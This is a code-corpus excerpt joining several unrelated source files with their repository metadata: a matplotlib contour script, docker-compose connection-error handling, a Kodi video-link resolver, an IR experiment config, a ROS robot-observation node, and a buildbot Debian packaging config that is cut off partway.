Data = np.loadtxt('contours.dat')
x = Data[:,0]
y = Data[:,1]
M = np.sqrt(Data[:,2]**2 + Data[:,3]**2)
Z = Data[:,2]+np.complex(0,1)*Data[:,3]
phi=(180/np.pi)*np.abs(np.arctan2(Data[:,3],Data[:,2]))
Dimension = np.sqrt(M.size)
X=np.linspace(x.min(),x.max(), Dimension)
Y=np.linspace(y.min(),y.max(), Dimension)
Xg,Yg=np.meshgrid(X,Y)
M0=np.reshape(M,[Dimension, Dimension])
phi0=np.reshape(phi,[Dimension, Dimension])
contourM=np.linspace(0.2,3.2,16)
contourP=np.linspace(0,360,15)
plt.figure(figsize=(7,5))
plt.contour(Xg,Yg,M0,contourM)
CS = plt.contour(Xg,Yg,phi0,contourP,colors='k',linestyles='dashdot')
Xcut=[-4.0,0]
Ycut=[0,0]
plt.plot(Xcut,Ycut,lw=2.5,color='k')
plt.xlabel('$x$')
plt.ylabel('$y$')
plt.title('Contour lines of the modulus and phase of $H_0^{(1)}(x+iy)$ \n (reproduced from Abramowitz \& Stegun, p.359)')
plt.savefig('contours.png')
| lgpl-3.0 | -98,053,031,246,251,260 | 23.259259 | 121 | 0.682443 | false |
shin-/compose | compose/cli/errors.py | 4 | 5174 | from __future__ import absolute_import
from __future__ import unicode_literals
import contextlib
import logging
import socket
from distutils.spawn import find_executable
from textwrap import dedent
from docker.errors import APIError
from requests.exceptions import ConnectionError as RequestsConnectionError
from requests.exceptions import ReadTimeout
from requests.exceptions import SSLError
from requests.packages.urllib3.exceptions import ReadTimeoutError
from ..const import API_VERSION_TO_ENGINE_VERSION
from .utils import binarystr_to_unicode
from .utils import is_docker_for_mac_installed
from .utils import is_mac
from .utils import is_ubuntu
from .utils import is_windows
log = logging.getLogger(__name__)
class UserError(Exception):
def __init__(self, msg):
self.msg = dedent(msg).strip()
def __unicode__(self):
return self.msg
__str__ = __unicode__
class ConnectionError(Exception):
pass
@contextlib.contextmanager
def handle_connection_errors(client):
try:
yield
except SSLError as e:
log.error('SSL error: %s' % e)
raise ConnectionError()
except RequestsConnectionError as e:
if e.args and isinstance(e.args[0], ReadTimeoutError):
log_timeout_error(client.timeout)
raise ConnectionError()
exit_with_error(get_conn_error_message(client.base_url))
except APIError as e:
log_api_error(e, client.api_version)
raise ConnectionError()
except (ReadTimeout, socket.timeout) as e:
log_timeout_error(client.timeout)
raise ConnectionError()
except Exception as e:
if is_windows():
import pywintypes
if isinstance(e, pywintypes.error):
log_windows_pipe_error(e)
raise ConnectionError()
raise
def log_windows_pipe_error(exc):
if exc.winerror == 232: # https://github.com/docker/compose/issues/5005
log.error(
"The current Compose file version is not compatible with your engine version. "
"Please upgrade your Compose file to a more recent version, or set "
"a COMPOSE_API_VERSION in your environment."
)
else:
log.error(
"Windows named pipe error: {} (code: {})".format(
binarystr_to_unicode(exc.strerror), exc.winerror
)
)
def log_timeout_error(timeout):
log.error(
"An HTTP request took too long to complete. Retry with --verbose to "
"obtain debug information.\n"
"If you encounter this issue regularly because of slow network "
"conditions, consider setting COMPOSE_HTTP_TIMEOUT to a higher "
"value (current value: %s)." % timeout)
def log_api_error(e, client_version):
explanation = binarystr_to_unicode(e.explanation)
if 'client is newer than server' not in explanation:
log.error(explanation)
return
version = API_VERSION_TO_ENGINE_VERSION.get(client_version)
if not version:
# They've set a custom API version
log.error(explanation)
return
log.error(
"The Docker Engine version is less than the minimum required by "
"Compose. Your current project requires a Docker Engine of "
"version {version} or greater.".format(version=version)
)
def exit_with_error(msg):
log.error(dedent(msg).strip())
raise ConnectionError()
def get_conn_error_message(url):
try:
if find_executable('docker') is None:
return docker_not_found_msg("Couldn't connect to Docker daemon.")
if is_docker_for_mac_installed():
return conn_error_docker_for_mac
if find_executable('docker-machine') is not None:
return conn_error_docker_machine
except UnicodeDecodeError:
# https://github.com/docker/compose/issues/5442
# Ignore the error and print the generic message instead.
pass
return conn_error_generic.format(url=url)
def docker_not_found_msg(problem):
return "{} You might need to install Docker:\n\n{}".format(
problem, docker_install_url())
def docker_install_url():
if is_mac():
return docker_install_url_mac
elif is_ubuntu():
return docker_install_url_ubuntu
elif is_windows():
return docker_install_url_windows
else:
return docker_install_url_generic
docker_install_url_mac = "https://docs.docker.com/engine/installation/mac/"
docker_install_url_ubuntu = "https://docs.docker.com/engine/installation/ubuntulinux/"
docker_install_url_windows = "https://docs.docker.com/engine/installation/windows/"
docker_install_url_generic = "https://docs.docker.com/engine/installation/"
conn_error_docker_machine = """
Couldn't connect to Docker daemon - you might need to run `docker-machine start default`.
"""
conn_error_docker_for_mac = """
Couldn't connect to Docker daemon. You might need to start Docker for Mac.
"""
conn_error_generic = """
Couldn't connect to Docker daemon at {url} - is it running?
If it's at a non-standard location, specify the URL with the DOCKER_HOST environment variable.
"""
| apache-2.0 | 4,879,124,926,595,999,000 | 29.797619 | 98 | 0.672014 | false |
listamilton/supermilton.repository | plugin.video.traquinas/resources/lib/resolvers/xvidstage.py | 23 | 1461 | # -*- coding: utf-8 -*-
'''
Specto Add-on
Copyright (C) 2015 lambda
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re
from resources.lib.libraries import client
from resources.lib.libraries import jsunpack
def resolve(url):
try:
url = url.replace('/embed-', '/')
url = re.compile('//.+?/([\w]+)').findall(url)[0]
url = 'http://xvidstage.com/embed-%s.html' % url
result = client.request(url, mobile=True)
result = re.compile('(eval.*?\)\)\))').findall(result)[-1]
result = jsunpack.unpack(result)
url = client.parseDOM(result, 'embed', ret='src')
url += re.compile("'file' *, *'(.+?)'").findall(result)
url = [i for i in url if not i.endswith('.srt')]
url = 'http://' + url[0].split('://', 1)[-1]
return url
except:
return
| gpl-2.0 | -7,894,659,031,319,673,000 | 30.76087 | 73 | 0.632444 | false |
danieldmm/minerva | evaluation_runs/aac_lrec_full_text_experiments.py | 1 | 12208 | # Experiments with the ACL corpus like the ones for LREC'16
#
# Copyright: (c) Daniel Duma 2016
# Author: Daniel Duma <[email protected]>
# For license information, see LICENSE.TXT
from __future__ import print_function
from __future__ import absolute_import
from proc.nlp_functions import AZ_ZONES_LIST, CORESC_LIST
import db.corpora as cp
from evaluation.experiment import Experiment
# BOW files to prebuild for generating document representation.
prebuild_bows={
##"full_text":{"function":"getDocBOWfull", "parameters":[1]},
##"title_abstract":{"function":"getDocBOWTitleAbstract", "parameters":[1]},
##"passage":{"function":"getDocBOWpassagesMulti", "parameters":[150,175,200,250,300,350,400,450]},
##"inlink_context":{"function":"generateDocBOWInlinkContext", "parameters":[200] },
##"ilc_AZ":{"function":"generateDocBOW_ILC_Annotated", "parameters":["paragraph","1up_1down","1up","1only"] },
"az_annotated":{"function":"getDocBOWannotated", "parameters":[1]},
##"section_annotated":{"function":"getDocBOWannotatedSections", "parameters":[1]},
}
# bow_name is just about the name of the file containing the BOWs
prebuild_indeces={
## "full_text":{"type":"standard_multi", "bow_name":"full_text", "parameters":[1]},
## "title_abstract":{"type":"standard_multi", "bow_name":"title_abstract", "parameters":[1]},
## "passage":{"type":"standard_multi", "bow_name":"passage", "parameters":[150,175,200,250,300,350,400,450]},
## "inlink_context":{"type":"standard_multi", "bow_name":"inlink_context", "parameters":[5, 10, 15, 20, 30, 40, 50]},
## "inlink_context_year":{"type":"standard_multi", "bow_name":"inlink_context", "parameters":[5, 10, 15, 20, 30, 40, 50], "options":{"max_year":True}},
"az_annotated_aac_2010":{"type":"standard_multi",
"bow_name":"az_annotated", # bow to load
"parameters":[1], # parameter has to match a parameter of a prebuilt bow
},
## "section_annotated":{"type":"standard_multi", "bow_methods":[("section_annotated",[1])], "parameters":[1]},
## # this is just ilc but split by AZ
## "ilc_AZ":{"type":"standard_multi", "bow_name":"ilc_AZ", "parameters":["paragraph","1up_1down","1up","1only"]},
## "ilc_full_text":{"type":"ilc_mashup", "ilc_method":"inlink_context", "mashup_method":"full_text", "ilc_parameters":[10,20,30, 40, 50], "parameters":[1]},
## "ilc_year_full_text":{"type":"ilc_mashup", "ilc_method":"inlink_context", "mashup_method":"full_text", "ilc_parameters":[10,20,30, 40, 50], "parameters":[1], "options":{"max_year":True}},
## "ilc_section_annotated":{"type":"ilc_mashup", "ilc_method":"inlink_context", "mashup_method":"section_annotated", "ilc_parameters":[10,20,30, 40, 50], "parameters":[1]},
## "ilc_passage":{"type":"ilc_mashup", "ilc_method":"inlink_context", "mashup_method":"passage","ilc_parameters":[5, 10, 20, 30, 40, 50], "parameters":[250,300,350]},
# this is just normal az_annotated + normal ilc
#### "ilc_az_annotated":{"type":"ilc_mashup", "ilc_method":"inlink_context", "mashup_method":"az_annotated", "ilc_parameters":[5, 10,20,30, 40, 50], "parameters":[1]},
##
#### # this is az-annotated text + az-annotated ilc
#### "az_ilc_az_":{"type":"ilc_mashup", "ilc_method":"ilc_AZ", "mashup_method":"az_annotated", "ilc_parameters":["paragraph","1up_1down","1up","1only"], "parameters":[1]},
}
prebuild_general_indexes={
## "full_text":{"type":"standard_multi", "bow_name":"full_text", "parameters":[1]},
## "ilc_full_text":{"type":"standard_multi", "bow_name":"full_text", "parameters":[1]},
"az_annotated_aac_2010":{"type":"standard_multi",
"bow_name":"az_annotated", # bow to load
"parameters":[1], # parameter has to match a parameter of a prebuilt bow
"max_year":2010 # cut-off point for adding files to index
},
}
doc_methods={
## "full_text":{"type":"standard_multi", "index":"full_text", "parameters":[1], "runtime_parameters":["text"]},
## "title_abstract":{"type":"standard_multi", "index":"title_abstract", "parameters":[1], "runtime_parameters":{"text":"1"}},
## "passage":{"type":"standard_multi", "index":"passage", "parameters":[250,350,400], "runtime_parameters":{"text":"1"}},
##
## "inlink_context":{"type":"standard_multi", "index":"inlink_context",
## "parameters": [10, 20, 30], "runtime_parameters":{"inlink_context":"1"}},
##
## "inlink_context_year":{"type":"standard_multi", "index":"inlink_context_year",
## "parameters": [10, 20, 30], "runtime_parameters":{"inlink_context":"1"}},
##
## "ilc_passage":{"type":"ilc_mashup", "index":"ilc_passage", "mashup_method":"passage","ilc_parameters":[10, 20, 30, 40, 50],
## "parameters":[250,350], "runtime_parameters":{"text":"1","inlink_context":"1"}},
"az_annotated":{"type":"annotated_boost", "index":"az_annotated_aac_2010", "parameters":[1], "runtime_parameters":{
"AZ_ALL":AZ_ZONES_LIST + ["_full_text"],
## "CSC_ALL":CORESC_LIST,
}},
## "section":{"type":"annotated_boost", "index":"section_annotated", "parameters":[1], "runtime_parameters":
## {
## "title_abstract":{"title":"1","abstract":"1"},
## "full_text":["title","abstract","text"],
## }},
##
## "ilc":{"type":"ilc_annotated_boost", "index":"ilc_section_annotated", "ilc_parameters":[10, 20, 30, 40, 50], "parameters":[1], "runtime_parameters":
## {
## "title_abstract":["title","abstract","inlink_context"],
## "full_text":["title", "abstract","text","inlink_context"],
## }},
# this is normal ilc + az_annotated
## "ilc_az_annotated":{"type":"ilc_annotated_boost", "index":"ilc_az_annotated", "parameters":[1], "ilc_parameters":[10, 20, 30, 40, 50], "runtime_parameters":
## {"ALL":["AIM","BAS","BKG","CTR","OTH","OWN","TXT","inlink_context"],
## }},
# this is sentence-based ILC, annotated with AZ and CSC
## "ilc_AZ":{"type":"annotated_boost", "index":"ilc_AZ", "parameters":["paragraph","1up_1down","1up","1only"], "runtime_parameters":
## {
## "ALL":["ilc_AZ_AIM","ilc_AZ_BAS","ilc_AZ_BKG","ilc_AZ_CTR","ilc_AZ_OTH","ilc_AZ_OWN","ilc_AZ_TXT"]
## }},
## "ilc_AZ":{"type":"annotated_boost", "index":"ilc_AZ", "parameters":["paragraph"], "runtime_parameters":
## {
## "AZ":["ilc_AZ_AIM","ilc_AZ_BAS","ilc_AZ_BKG","ilc_AZ_CTR","ilc_AZ_OTH","ilc_AZ_OWN","ilc_AZ_TXT"],
## "CSC": ["ilc_CSC_"+zone for zone in CORESC_LIST],
## }},
# this is sentence-based AZ and AZ-annotated document contents
## "az_ilc_az":{"type":"ilc_annotated_boost", "index":"az_ilc_az", "parameters":[],
## "ilc_parameters":["1only","1up","1up1down","paragraph"],
## "runtime_parameters":
## {
## "ALL":["ilc_AZ_AIM","ilc_AZ_BAS","ilc_AZ_BKG","ilc_AZ_CTR","ilc_AZ_OTH","ilc_AZ_OWN","ilc_AZ_TXT","ilc_AZ_AIM"],
###### "OTH":{"AIM":"0","BAS":"0","BKG":"0","CTR":"0","OTH":"1","OWN":"0","TXT":"0","inlink_context":1},
###### "OWN":{"AIM":"0","BAS":"0","BKG":"0","CTR":"0","OTH":"0","OWN":"1","TXT":"0","inlink_context":1},
## }},
}
# this is the dict of query extraction methods
qmethods={
## "window":{"parameters":[
## (3,3),
## (5,5),
## (10,10),
## (5,10),
## (10,5),
## (20,20),
## (20,10),
## (10,20),
## (30,30),
## (50,50),
## (100,100),
## (500,500),
## ],
## "method":"Window",
## },
"sentence":{"parameters":[
## "1only",
## "paragraph",
## "1up",
## "0up_1down",
"1up_1down",
## "2up_2down"
],
"method":"Sentences",
},
## "annotated_sentence":{"parameters":[
## "pno",
## "po",
## "no",
## "n",
## "p",
## ],
## "method":"SelectedSentences",
## },
}
experiment={
"name":"aac_lrec_experiments",
"description":
"""Re-run the LREC experiments with AZ instead of CoreSC, including _full_text for search""",
# dict of bag-of-word document representations to prebuild
"prebuild_bows":prebuild_bows,
# dict of per-file indexes to prebuild
"prebuild_indeces":prebuild_indeces,
# dict of general indexes to prebuild
"prebuild_general_indexes":prebuild_general_indexes,
# dictionary of document representation methods to test
"doc_methods":doc_methods,
# dictionary of query generation methods to test
"qmethods":qmethods,
# list of files in the test set
"test_files":[],
# SQL condition to automatically generate the list above
"test_files_condition":"metadata.num_in_collection_references:>0 AND metadata.year:>2010",
# This lets us pick just the first N files
"max_test_files":1000,
# Use Lucene DefaultSimilarity? As opposed to FieldAgnosticSimilarity
"use_default_similarity":True,
# Annotate sentences with AZ/CoreSC/etc?
"rhetorical_annotations":[],
# Run annotators? If False, it is assumed the sentences are already annotated
"run_rhetorical_annotators":False,
# Separate queries by AZ/CSC, etc?
"use_rhetorical_annotation":True,
"weight_values":[],
# ?
## "split_set":None,
# use full-collection retrival? If False, it runs "citation resolution"
"full_corpus":True,
# "compute_once","train_weights"
"type":"train_weights",
# If full_corpus, this is the cut-off year for including documents in the general index.
# In this way we can separate test files and retrieval files.
"index_max_year": 2010,
# how many chunks to split each file for statistics on where the citation occurs
"numchunks":10,
# name of CSV file to save results in
"output_filename":"results.csv",
"pivot_table":"",
"max_results_recall":200,
# should queries be classified based on some rhetorical class of the sentence: "az", "csc_type"
"queries_classification":"az",
# do not process more than this number of queries of the same type (type on line above)
"max_per_class_results" : 1000,
# of all precomputed queries, which classes should be processed/evaluated?
"queries_to_process":["ALL"],
# what "zones" to try to train weights for
"train_weights_for": AZ_ZONES_LIST, #["Bac"], ["Hyp","Mot","Bac","Goa","Obj","Met","Exp","Mod","Obs","Res","Con"]
# add another doc_method showing the score based on analytical random chance?
"add_random_control_result": False,
"precomputed_queries_filename":"precomputed_queries.json",
"files_dict_filename":"files_dict.json",
}
options={
"run_prebuild_bows":0, # should the whole BOW building process run?
"overwrite_existing_bows":0, # if a BOW exists already, should we overwrite it?
"build_indexes":0, # rebuild indices?
"overwrite_existing_queries":0, # force rebuilding of queries too?
"run_precompute_retrieval":0, # only applies if type == "train_weights"
"clear_existing_prr_results":False, # delete previous precomputed results? i.e. start from scratch
"override_folds":4,
"override_metric":"avg_ndcg",
}
def main():
from multi.celery_app import MINERVA_ELASTICSEARCH_ENDPOINT
cp.useElasticCorpus()
cp.Corpus.connectCorpus("g:\\nlp\\phd\\aac", endpoint=MINERVA_ELASTICSEARCH_ENDPOINT)
cp.Corpus.setCorpusFilter("AAC")
## experiment["test_files"]=["456f8c80-9807-46a9-8455-cd4a7e346f9d"]
exp=Experiment(experiment, options, False)
exp.run()
if __name__ == '__main__':
main()
## from proc.doc_representation import getDictOfLuceneIndeces
## from evaluation.base_pipeline import getDictOfTestingMethods
## print(getDictOfLuceneIndeces(prebuild_general_indexes))
## print(getDictOfTestingMethods(doc_methods))
| gpl-3.0 | 7,758,306,421,760,707,000 | 47.444444 | 193 | 0.594938 | false |
guilhermelawless/randgen_omni_dataset | randgen_omni_dataset/src/randgen_omni_dataset/omni_custom.py | 1 | 8687 | import rospy
import tf
import random
from read_omni_dataset.msg import *
from randgen_omni_dataset.msg import *
from geometry_msgs.msg import PoseStamped, PoseWithCovariance, PointStamped, Point
from visualization_msgs.msg import Marker, MarkerArray
from randgen_omni_dataset.robot import norm2
GLOBAL_FRAME = 'world'
MAX_DIST = 3.5
class OmniCustom():
# This class will transform messages and TFs to our custom msg format for the OMNI dataset
def __init__(self, topic_gt='/gtData'):
# type: (str) -> None
# initiate main GT message
self.gt = LRMGTData()
self.gt.orangeBall3DGTposition.found = False
# figure out information on existing robots
try:
playing_robots = rospy.get_param('PLAYING_ROBOTS')
except rospy.ROSException, err:
rospy.logerr('Error in parameter server - %s', err)
raise
except KeyError, err:
rospy.logerr('Value of %s not set', err)
raise
# save number of robots available
self.numberRobots = len(playing_robots)
# create a tf listener
self.listener = tf.TransformListener()
# initiate the publisher for the GT msg
self.publisher_gt = rospy.Publisher(topic_gt, LRMGTData, queue_size=10)
# iterate through the playing robots list, building our list of PoseWithCovariance msgs
list_ctr = 0
self.publishers_lm = []
self.publishers_target = []
self.publishers_robs = []
self.heights = []
for idx, running in enumerate(playing_robots):
# robot ID and name
idx += 1
idx_s = str(idx)
name = 'omni' + idx_s
# add a new PoseWithCovariance object to our poseOMNI list in the GT message
self.gt.poseOMNI.append(PoseWithCovariance())
# add a new bool to our foundOMNI list in the GT message
# will be True when first message comes
self.gt.foundOMNI.append(False)
# robot height
if rospy.has_param(name + '/height'):
self.heights.append(rospy.get_param(name + '/height'))
else:
rospy.logfatal(name + ' height not set')
# add subscriber to its pose, with an additional argument concerning the list position
rospy.Subscriber(name + '/simPose', PoseStamped, self.robot_pose_callback, list_ctr)
# initiate the publisher for the landmarks observations msg
self.publishers_lm.append(rospy.Publisher(name + '/landmarkspositions', LRMLandmarksData, queue_size=10))
# add subscriber to the landmark observations with argument to list id
rospy.Subscriber(name + '/landmarkObs', MarkerArray, self.landmarks_callback, list_ctr)
# initiate the publisher for the target observation msg
self.publishers_target.append(rospy.Publisher(name + '/orangeball3Dposition', BallData, queue_size=10))
# add subscriber to the target observations with argument to list id
rospy.Subscriber(name + '/targetObs', Marker, self.target_callback, list_ctr)
# publisher for the robot observation array msg
self.publishers_robs.append(rospy.Publisher(name + '/robotsobservations', RobotObservationArray, queue_size=10))
# subscriber to robot observations
rospy.Subscriber(name + '/robotObs', MarkerArray, self.robot_observations_callback, list_ctr)
# wait for odometry service to be available before continue
rospy.wait_for_service(name + '/genOdometry/change_state')
# increment counter
list_ctr += 1
# subscriber to target gt data
self.sub_target = rospy.Subscriber('/target/simPose', PointStamped, self.target_pose_callback, queue_size=5)
def robot_pose_callback(self, msg, list_id):
# type: (PoseStamped, int) -> None
# update this robot's information in our GT message
self.gt.foundOMNI[list_id] = True
# update time stamp to latest msg time
self.gt.header.stamp = msg.header.stamp
# transform the pose from this robot frame to the global frame, using the tf listener
try:
# find latest time for transformation
msg.header.stamp = self.listener.getLatestCommonTime(GLOBAL_FRAME, msg.header.frame_id)
new_pose = self.listener.transformPose(GLOBAL_FRAME, msg)
except tf.Exception, err:
rospy.logdebug("TF Exception when transforming other robots - %s", err)
return
# insert new pose in the GT message
self.gt.poseOMNI[list_id].pose = new_pose.pose
# if all robots have been found, publish the GT message
if self.numberRobots == sum(found is True for found in self.gt.foundOMNI):
try:
self.publisher_gt.publish(self.gt)
except rospy.ROSException, err:
rospy.logdebug('ROSException - %s', err)
def target_pose_callback(self, msg):
# type: (PointStamped) -> None
# update our GT message with the new information
self.gt.orangeBall3DGTposition.found = True
self.gt.orangeBall3DGTposition.header.stamp = msg.header.stamp
self.gt.orangeBall3DGTposition.x = msg.point.x
self.gt.orangeBall3DGTposition.y = msg.point.y
self.gt.orangeBall3DGTposition.z = msg.point.z
# publish this message
try:
self.publisher_gt.publish(self.gt)
except rospy.ROSException, err:
rospy.logdebug('ROSException - %s', err)
def landmarks_callback(self, msg, list_id):
# type: (MarkerArray) -> None
# create msg and insert information
lm_msg = LRMLandmarksData()
lm_msg.header.stamp = rospy.Time.now()
for marker in msg.markers:
# Our point of interest is the 2nd in the points list
point = marker.points[1]
# Add x and y
lm_msg.x.append(point.x)
lm_msg.y.append(point.y)
# Simulate the area expected as a function of distance to landmark with a little randomness
dist = norm2(point.x, point.y)
lm_msg.AreaLandMarkExpectedinPixels.append(MAX_DIST)
# randomness is currently a number between -1 and 1. It checks for minimum 0 and max MAX_DIST
lm_msg.AreaLandMarkActualinPixels.append(max(0, min(dist + (random.random()*2 - 1), MAX_DIST)))
# Add found
lm_msg.found.append(marker.text == 'Seen')
# publish with updated information
try:
self.publishers_lm[list_id].publish(lm_msg)
except rospy.ROSException, err:
rospy.logdebug('ROSException - %s', err)
def target_callback(self, msg, list_id):
# type: (Marker) -> None
# create msg and insert information
ball_msg = BallData()
ball_msg.header.stamp = msg.header.stamp
# Our point of interest is the 2nd in the points list
point = msg.points[1]
# Add x and y
ball_msg.x = point.x
ball_msg.y = point.y
ball_msg.z = point.z + self.heights[list_id]
# Add found - this is my way of coding if the ball is seen in the Marker message
ball_msg.found = (msg.text == 'Seen')
# ignoring the mismatchfactor since it's not being used by the algorithm
# publish with updated information
try:
self.publishers_target[list_id].publish(ball_msg)
except rospy.ROSException, err:
rospy.logdebug('ROSException - %s', err)
def robot_observations_callback(self, msg, list_id):
# type: (MarkerArray) -> None
if len(msg.markers) == 0:
return
# create msg and insert information
robs_msg = RobotObservationArray()
robs_msg.header = msg.markers[0].header
robs_msg.self_id = int(robs_msg.header.frame_id[-1])
# information encoded in the 2nd point of the marker point list
for marker in msg.markers:
obs = RobotObservation(idx = marker.id,
x = marker.points[1].x,
y = marker.points[1].y,
occluded = (marker.text == 'NotSeen') )
robs_msg.observations.append(obs)
# Publish
try:
self.publishers_robs[list_id].publish(robs_msg)
except rospy.ROSException, err:
rospy.logdebug('ROSException - %s', err)
| gpl-3.0 | -5,166,600,241,205,232,000 | 37.955157 | 124 | 0.612524 | false |
nextgis/buildbot | makedeb.py | 1 | 12823 | # -*- python -*-
# ex: set syntax=python:
# production builds into nextgis ppa
from buildbot.plugins import *
import os
c = {}
repositories = [
{'repo':'lib_geos', 'deb':'geos', 'repo_root':'git://github.com', 'org': 'nextgis-borsch', 'os':['bionic', 'stretch', 'focal', 'buster', ], 'repo_id':11},
{'repo':'lib_proj', 'deb':'proj', 'repo_root':'git://github.com', 'org': 'nextgis-borsch', 'os':['bionic', 'stretch', 'focal', 'buster', ], 'repo_id':11},
{'repo':'lib_geotiff', 'deb':'libgeotiff', 'repo_root':'git://github.com', 'org': 'nextgis-borsch', 'os':['bionic', 'stretch', 'focal', 'buster', ], 'repo_id':11},
{'repo':'lib_opencad', 'deb':'opencad', 'repo_root':'git://github.com', 'org': 'nextgis-borsch', 'os':['bionic', 'stretch', 'focal', 'buster', ], 'repo_id':11},
{'repo':'lib_oci', 'deb':'oci', 'repo_root':'git://github.com', 'org': 'nextgis-borsch', 'os':['bionic', 'stretch', 'focal', 'buster', ], 'repo_id':11},
{'repo':'lib_gdal', 'deb':'gdal', 'repo_root':'git://github.com', 'org': 'nextgis-borsch', 'os':['bionic', 'stretch', 'focal', 'buster', ], 'repo_id':11},
{'repo':'lib_spatialite', 'deb':'spatialite', 'repo_root':'git://github.com', 'org': 'nextgis-borsch', 'os':['bionic', 'stretch', 'focal', 'buster', ], 'repo_id':11},
{'repo':'mapserver', 'deb':'mapserver', 'repo_root':'git://github.com', 'org': 'nextgis-borsch', 'os':['bionic', 'stretch', 'focal', 'buster', ], 'repo_id':11},
{'repo':'nextgisutilities', 'deb':'nextgisutilities', 'repo_root':'git://github.com', 'org': 'nextgis', 'os': ['bionic', 'buster', 'focal',], 'repo_id':12, 'apt_repos':[{
'repka_id':11,
'type':'repka',
},]
},
{'repo':'postgis', 'deb':'postgis', 'repo_root':'git://github.com', 'org': 'nextgis-borsch', 'os': ['bionic', 'buster', 'focal',], 'repo_id':11, 'apt_repos':[{
'deb':'deb http://apt.postgresql.org/pub/repos/apt/ {}-pgdg main',
'key':'B97B0AFCAA1A47F044F244A07FCC7D46ACCC4CF8',
'keyserver':'keyserver.ubuntu.com',
'type':'deb',
},]
},
{'repo':'lib_ngstd', 'deb':'ngstd', 'repo_root':'git://github.com', 'org': 'nextgis', 'os': ['bionic', 'focal',], 'repo_id':11},
{'repo':'formbuilder', 'deb':'formbuilder', 'repo_root':'git://github.com', 'org': 'nextgis', 'os': ['bionic', 'focal',], 'repo_id':11},
{'repo':'manuscript', 'deb':'manuscript', 'repo_root':'git://github.com', 'org': 'nextgis', 'os': ['bionic','focal', ], 'repo_id':11},
{'repo':'mapnik-german-l10n', 'deb':'osml10n', 'repo_root':'git://github.com', 'org': 'nextgis', 'os': ['bionic', 'buster', 'focal',], 'repo_id':11, 'apt_repos':[{
'deb':'deb http://apt.postgresql.org/pub/repos/apt/ {}-pgdg main',
'key':'B97B0AFCAA1A47F044F244A07FCC7D46ACCC4CF8',
'keyserver':'keyserver.ubuntu.com',
'type':'deb',
},]
},
{'repo':'nextgisqgis', 'deb':'nextgisqgis', 'repo_root':'git://github.com', 'org': 'nextgis', 'os': ['bionic', 'focal', 'buster'], 'repo_id':11, 'branch': 'dev/up_to_3'},
{'repo':'qgis_headless', 'deb':'qgis-headless', 'repo_root':'https://gitlab.com:' + os.environ.get("BUILDBOT_APITOKEN_GITLAB_FULL") + '@gitlab.com', 'org': 'nextgis_private', 'os': ['bionic', 'focal', 'buster'], 'repo_id':11, 'branch': 'master'},
{'repo':'terratile', 'deb':'python-terratile', 'repo_root':'git://github.com', 'org': 'nextgis', 'os':['bionic', 'stretch', 'focal', 'buster'], 'repo_id':11, 'branch': 'gdal3'},
# {'repo':'lib_qscintilla', 'version':'2.10.4', 'deb':'qscintilla', 'subdir': '', 'repo_root':'nextgis-borsch', 'url': '', 'ubuntu_distributions': ['trusty', 'focal', 'bionic']},
# {'repo':'py_future', 'version':'0.17.1', 'deb':'python-future', 'subdir': '', 'repo_root':'nextgis-borsch', 'url': 'https://files.pythonhosted.org/packages/90/52/e20466b85000a181e1e144fd8305caf2cf475e2f9674e797b222f8105f5f/future-0.17.1.tar.gz', 'ubuntu_distributions': ['trusty', 'focal', 'bionic']},
# {'repo':'py_raven', 'version':'6.10.0', 'deb':'python-raven', 'subdir': '', 'repo_root':'nextgis-borsch', 'url': 'https://files.pythonhosted.org/packages/79/57/b74a86d74f96b224a477316d418389af9738ba7a63c829477e7a86dd6f47/raven-6.10.0.tar.gz', 'ubuntu_distributions': ['trusty', 'focal', 'bionic']},
# {'repo':'py_setuptools', 'version':'40.6.3', 'deb':'python-setuptools', 'subdir': '', 'repo_root':'nextgis-borsch', 'url': 'https://files.pythonhosted.org/packages/37/1b/b25507861991beeade31473868463dad0e58b1978c209de27384ae541b0b/setuptools-40.6.3.zip', 'ubuntu_distributions': ['trusty', 'focal', 'bionic']},
# {'repo':'dante','version':'1.4.2', 'deb':'dante', 'subdir': '', 'repo_root':'nextgis', 'url': '', 'ubuntu_distributions': ['trusty', 'focal', 'bionic']},
# {'repo':'pam-pgsql','version':'0.7.3.3', 'deb':'pam-pgsql', 'subdir': '', 'repo_root':'nextgis', 'url': '', 'ubuntu_distributions': ['trusty', 'focal', 'bionic']},
# {'repo':'protobuf-c','version':'1.3.0', 'deb':'protobuf-c', 'subdir': '', 'repo_root':'nextgis-borsch', 'url': '', 'ubuntu_distributions': ['trusty', 'focal', 'bionic']},
# {'repo':'protobuf','version':'3.5.1', 'deb':'protobuf', 'subdir': '', 'repo_root':'nextgis-borsch', 'url': '', 'ubuntu_distributions': ['trusty', 'focal', 'bionic']},
# {'repo':'osrm-backend','version':'0.1', 'deb':'osrm-backend', 'subdir': '', 'repo_root':'nextgis-borsch', 'url': '', 'ubuntu_distributions': ['bionic']},
]
c['change_source'] = []
c['schedulers'] = []
c['builders'] = []
platforms = [
{'name' : 'focal', 'worker' : 'deb-build-focal'},
{'name' : 'bionic', 'worker' : 'deb-build-bionic'},
{'name' : 'xenial', 'worker' : 'deb-build-xenial'},
{'name' : 'trusty', 'worker' : 'deb-build-trusty'},
{'name' : 'stretch', 'worker' : 'deb-build-stretch'},
{'name' : 'buster', 'worker' : 'deb-build-buster'},
{'name' : 'sid', 'worker' : 'deb-build-sid'},
]
build_lock = util.MasterLock("deb_worker_builds")
script_src = 'https://raw.githubusercontent.com/nextgis/buildbot/master/worker/deb_util.py'
script_name = 'deb_util.py'
logname = 'stdio'
username = 'buildbot'
userkey = os.environ.get("BUILDBOT_PASSWORD")
root_dir = 'build'
ver_dir = root_dir + '/ver'
def get_env(os):
env = {
'BUILDBOT_USERPWD': '{}:{}'.format(username, userkey),
}
return env
# Create builders
for repository in repositories:
project_name = repository['repo']
org = repository['org']
repourl = '{}/{}/{}.git'.format(repository['repo_root'], org, project_name)
branch = 'master'
if 'branch' in repository:
branch = repository['branch']
git_project_name = '{}/{}'.format(org, project_name)
git_poller = changes.GitPoller(project = git_project_name,
repourl = repourl,
workdir = project_name + '-workdir',
branches = [branch],
pollinterval = 5400,)
c['change_source'].append(git_poller)
builderNames = []
for platform in platforms:
if platform['name'] in repository['os']:
